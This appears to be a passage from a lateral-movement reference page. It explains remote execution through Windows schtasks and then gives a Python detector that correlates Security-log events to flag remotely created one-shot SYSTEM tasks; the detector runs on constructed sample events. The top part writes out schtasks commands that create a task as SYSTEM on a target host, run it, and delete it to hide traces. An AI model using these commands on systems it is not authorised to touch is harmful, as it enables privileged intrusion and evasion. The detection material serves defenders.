IMPORTANT

By default, UAC's remote restrictions limit remote schtasks calls to domain admins and the built-in local "Administrator" account. Other local Windows admins cannot call this service remotely unless UAC is disabled first!

The schtasks command can also be used to create and manipulate scheduled tasks on remote machines. It uses Windows RPC (TCP 135), but falls back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, schtasks works the same way locally; the only difference is that in that case a local named pipe is always used.)

# Create $ATTACKER_TASK on $TARGET_HOST. The task runs as SYSTEM and
# fires once; /SD (start date) and /ST (start time) don't matter if
# we're invoking the task manually, as we do next. Note that the /SD
# date format follows the target's locale (MM/DD/YYYY shown here).
#
schtasks /Create /S $TARGET_HOST /RU "SYSTEM" `
         /TN "$ATTACKER_TASK" /TR "$SOME_COMMAND" /SC ONCE `
         /SD 06/25/2023 /ST 16:10

# Invoke $ATTACKER_TASK.
#
schtasks /Run /S $TARGET_HOST /TN "$ATTACKER_TASK"

# Clean up after yourself.
#
schtasks /Delete /S $TARGET_HOST /TN "$ATTACKER_TASK" /F
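The three-step sequence above (create a one-shot task as SYSTEM from a remote host, run it, delete it) leaves a characteristic trail in the target's Security log: a 4624 network logon (LogonType 3), a 4698 "scheduled task created" event whose Subject Logon ID matches that logon, and a 4699 deletion shortly afterwards. The following detection script is an added example, not part of the original page; it correlates constructed events shaped like those three record types (field names mirror the Security log schema, but every value is made up) and scores tasks created under a network logon. In practice the input would come from an EVTX or SIEM export rather than the inline list.

```python
"""Flag scheduled tasks created over the network (schtasks /S ...).

Added example, not from the page. Events are dicts as a log parser might
emit them; the sample list below is constructed for illustration.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NETWORK_LOGON = 3          # 4624 LogonType for SMB/RPC logons
SYSTEM_SID = "S-1-5-18"    # task principal written by /RU "SYSTEM"
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Constructed 4698 TaskContent blobs (the XML the Task Scheduler logs).
ONE_SHOT_SYSTEM_TASK = f"""<Task xmlns="{TASK_NS}" version="1.2">
  <Triggers><TimeTrigger><StartBoundary>2023-06-25T16:10:00</StartBoundary></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>{SYSTEM_SID}</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>cmd.exe</Command><Arguments>/c echo constructed</Arguments></Exec></Actions>
</Task>"""
DAILY_SERVICE_TASK = f"""<Task xmlns="{TASK_NS}" version="1.2">
  <Triggers><CalendarTrigger><StartBoundary>2023-06-01T02:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111-2222-3333-1104</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Tools\\backup.exe</Command></Exec></Actions>
</Task>"""

T0 = datetime(2023, 6, 25, 16, 9, 0)
SAMPLE_EVENTS = [  # constructed, not real log data
    {"EventID": 4624, "LogonType": 3, "TargetLogonId": "0x3e7a1", "TargetUserName": "jdoe", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "LogonType": 2, "TargetLogonId": "0x5c001", "TargetUserName": "alice", "IpAddress": "-"},
    {"EventID": 4624, "LogonType": 3, "TargetLogonId": "0x41b22", "TargetUserName": "svc-backup", "IpAddress": "10.0.0.77"},
    {"EventID": 4698, "Time": T0, "SubjectLogonId": "0x3e7a1", "SubjectUserName": "jdoe",
     "TaskName": "\\updater", "TaskContent": ONE_SHOT_SYSTEM_TASK},
    {"EventID": 4698, "Time": T0, "SubjectLogonId": "0x5c001", "SubjectUserName": "alice",
     "TaskName": "\\LocalJob", "TaskContent": DAILY_SERVICE_TASK},
    {"EventID": 4698, "Time": T0, "SubjectLogonId": "0x41b22", "SubjectUserName": "svc-backup",
     "TaskName": "\\Backup", "TaskContent": DAILY_SERVICE_TASK},
    {"EventID": 4699, "Time": T0 + timedelta(minutes=2), "SubjectLogonId": "0x3e7a1", "TaskName": "\\updater"},
]


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def parse_task_xml(task_content):
    """Return (run_as_sid, [commands], [trigger kinds]) from a 4698 TaskContent blob."""
    run_as, commands, triggers = None, [], []
    for el in ET.fromstring(task_content).iter():
        name = _local(el.tag)
        if name == "UserId":
            run_as = (el.text or "").strip()
        elif name == "Command":
            commands.append((el.text or "").strip())
        elif name == "Triggers":
            triggers = [_local(child.tag) for child in el]
    return run_as, commands, triggers


def find_remote_task_creations(events, delete_window=timedelta(minutes=10)):
    """Correlate 4698 creations with 4624 network logons via the logon ID."""
    network_logons = {e["TargetLogonId"]: e for e in events
                      if e["EventID"] == 4624 and e["LogonType"] == NETWORK_LOGON}
    deletions = {e["TaskName"]: e["Time"] for e in events if e["EventID"] == 4699}
    findings = []
    for e in events:
        if e["EventID"] != 4698:
            continue
        logon = network_logons.get(e["SubjectLogonId"])
        if logon is None:
            continue  # created from a local/interactive session: out of scope here
        run_as, commands, triggers = parse_task_xml(e["TaskContent"])
        deleted_at = deletions.get(e["TaskName"])
        findings.append({
            "task": e["TaskName"],
            "creator": e["SubjectUserName"],
            "source_ip": logon["IpAddress"],
            "runs_as_system": run_as == SYSTEM_SID,
            "commands": commands,
            "one_shot": triggers == ["TimeTrigger"],       # /SC ONCE
            "deleted_within_window": deleted_at is not None and deleted_at - e["Time"] <= delete_window,
        })
    return findings


def severity(finding):
    """SYSTEM plus run-once or quick deletion is the page's exact pattern."""
    if finding["runs_as_system"] and (finding["one_shot"] or finding["deleted_within_window"]):
        return "high"
    return "medium"


if __name__ == "__main__":
    for f in find_remote_task_creations(SAMPLE_EVENTS):
        print(severity(f), f["task"], f["creator"], f["source_ip"], f["commands"])
```

The logon-ID join is what separates a remote creation from an administrator editing tasks at the console; the same join works against the TaskScheduler/Operational log if 4698 auditing (Object Access: Other Object Access Events) is not enabled, though that log lacks the task XML.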